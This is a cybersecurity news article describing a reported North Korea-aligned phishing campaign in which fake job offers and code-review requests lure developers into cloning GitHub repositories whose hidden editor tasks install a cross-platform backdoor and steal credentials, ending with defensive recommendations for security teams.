North Korean Hackers Target Developers via GitHub
A new cybersecurity threat has emerged as North Korea-aligned hackers are targeting the developer community by embedding harmful code in GitHub repositories. This new method, part of a campaign named UNK_DeadDrop, involves tricking developers with fake job offers and code review requests. The goal is to have them clone repositories that unknowingly install malware on their systems.
Between April and May 2026, over 250 phishing emails were sent to individuals in nearly 100 organizations. These attacks primarily targeted the finance, cryptocurrency, education, and technology sectors, with a focus on companies in the United States. The hackers used realistic company names and professional sender domains to appear legitimate.
Phishing Campaigns and Malware Deployment
According to Proofpoint, a cybersecurity firm, this activity is likely conducted by a North Korea-aligned group, distinct from but similar to the Contagious Interview group. Although direct infrastructure overlaps were not found, significant similarities in tactics were noted. The malware used in these attacks is cross-platform, affecting macOS, Linux, and Windows, utilizing the Go-based Overlord framework for persistent command-and-control connections.
This malware campaign is particularly dangerous due to its seamless integration into developers’ regular workflows. A developer receiving a seemingly genuine email about a technical assignment might clone a repository and open it in their code editor, unwittingly triggering the attack.
Malicious Use of GitHub Repositories
Phishing emails lure developers to GitHub or GitLab repositories that mimic legitimate coding projects. These emails resemble job recruitment or code review requests from fake companies like Pulsynk and Ondo Finance. When developers clone these repositories, hidden files execute malicious scripts within Visual Studio Code or Cursor, potentially compromising their systems.
On macOS and Linux, a disguised Google service installs a malicious VS Code extension, initiating the Overlord backdoor. On Windows, the payload runs within the editor’s process, avoiding detection by not dropping binaries to disk.
Credential Theft and Data Exfiltration
Once the malware is active, it aims to steal valuable data. For instance, on macOS, a fake system dialog prompts users for their device password, which the malware then uses to access browser credentials. Similarly, Linux systems are targeted using Zenity dialogs, while Windows systems bypass App-Bound Encryption to extract credentials.
The stolen data, including cryptocurrency wallet contents and browser cookies, is collected and sent to a server controlled by the attackers. Developers, especially those handling cryptocurrency in DeFi or blockchain sectors, are at significant risk.
It is recommended that security teams inspect developer-facing repositories for hidden .vscode folders and unexpected tasks.json files. Organizations should also restrict automatic task execution in Visual Studio Code and monitor network traffic for unusual connections.
For ongoing updates, follow us on Google News, LinkedIn, and X. Set CSN as your preferred news source on Google.
